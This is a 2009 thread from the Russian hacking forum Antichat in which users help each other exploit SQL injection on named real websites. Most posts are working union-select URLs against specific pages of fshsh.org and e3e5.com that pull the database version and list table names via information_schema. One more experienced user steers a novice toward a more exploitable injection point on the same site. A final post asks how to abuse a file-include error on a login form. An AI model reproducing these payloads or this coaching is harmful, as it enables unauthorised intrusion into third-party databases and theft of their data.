ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
17.05.2009, 14:39
|
|
Members of Antichat - Level 5
Регистрация: 28.05.2007
Сообщений: 729
Провел на форуме:
5571194
Репутация:
1934
|
|
Сообщение от diznt
есть ли генератор на php
в который ввел значение типа "pg_users"
А она тебе примерно это
chr(111)||chr(110)||chr(97)
?
Если нужно на js - могу поделиться.
__________________
Появляюсь редко. Важные дела в реале.
|
|
|
17.05.2009, 14:52
|
|
Новичок
Регистрация: 08.02.2009
Сообщений: 24
Провел на форуме:
81772
Репутация:
10
|
|
Код:
http://www.fshsh.org/lajmi.php?id=-47+union+select+1,2,3,4,5--
но
Код:
http://www.fshsh.org/lajmi.php?id=-47+union+select+1,version(),3,4,5--
ничего не выводит. unhex(hex(version())) и др. кодирование не помогает.. Как раскрутить ее? |
|
|
|
17.05.2009, 14:53
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514
Репутация:
3338
|
|
|
|
|
|
17.05.2009, 14:56
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514
Репутация:
3338
|
|
2 ПаВлУшКа:
http://www.fshsh.org/lajmi.php?id=-47+union+select+1,2,@@version,4,5--
|
|
|
|
17.05.2009, 15:02
|
|
Новичок
Регистрация: 08.02.2009
Сообщений: 24
Провел на форуме:
81772
Репутация:
10
|
|
Pashkela, а дальше? Как узнать имена таблиц, колонок?
|
|
|
|
17.05.2009, 15:05
|
|
Постоянный
Регистрация: 11.11.2006
Сообщений: 834
Провел на форуме:
3941248
Репутация:
668
|
|
через information_schema пробуй =)
|
|
|
|
17.05.2009, 15:11
|
|
Новичок
Регистрация: 08.02.2009
Сообщений: 24
Провел на форуме:
81772
Репутация:
10
|
|
Doom123, естественно через нее, вот только не выводится ничего..
|
|
|
|
17.05.2009, 15:53
|
|
Участник форума
Регистрация: 15.03.2009
Сообщений: 231
Провел на форуме:
859739
Репутация:
146
|
|
что можно дальше с этим сделать?
Но можно воспользоваться аналогом "more that 1 row".
http://www.e3e5.com/author.php?id=-1018))+union+select+null,null,null,null,null,null, null,null,null,null,null,null,null,null,null,null+ from+author+where+((1=(select+1,2)+
|
|
|
|
17.05.2009, 16:05
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514
Репутация:
3338
|
|
2 ПаВлУшКа:
А дальше включать мосг, подумав решить, что ЭТА скуля тупая и нам не нужна и найти на этом же сайте другую, ХОРОШУЮ скулю:
Код:
http://www.fshsh.org/kalendaridetaj.php?id=-4+union+select+1,2,3,4,version()
Код:
http://www.fshsh.org/kalendaridetaj.php?id=-4+union+select+1,2,3,4,table_name+from+information_schema.tables
|
|
|
|
17.05.2009, 20:28
|
|
Новичок
Регистрация: 27.03.2008
Сообщений: 4
Провел на форуме:
17407
Репутация:
1
|
|
Подскажите:
Есть форма авторизации там есть
<select id="number" name="number">
<OPTION value="aa">1</OPTION>
<OPTION value="bb">2</OPTION>
<OPTION value="cc">3</OPTION>
<OPTION value="dd">4</OPTION>
</select>
и кнопка отправки, данные форма передаёт файлу login.php
после изменения в форме value="aa" например на value="aa2" то после отправки запроса выдаёт ошибку примерно такого содержания
Код:
Warning: require_once(configaa2.php) [function.require-once]: failed to open stream: No such file or directory in /var/www/site/htdocs/login.php on line 103 Fatal error: require_once() [function.require]: Failed opening required 'configaa2.php' (include_path='.:/usr/share/php5:/usr/share/php') in /var/www/site/htdocs/login.php on line 103
Подскажите что можно тут выполнить?например чтонибудь связаное с инклудом другого файла
p.s извеняйте за обьяснение, как смог( |
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
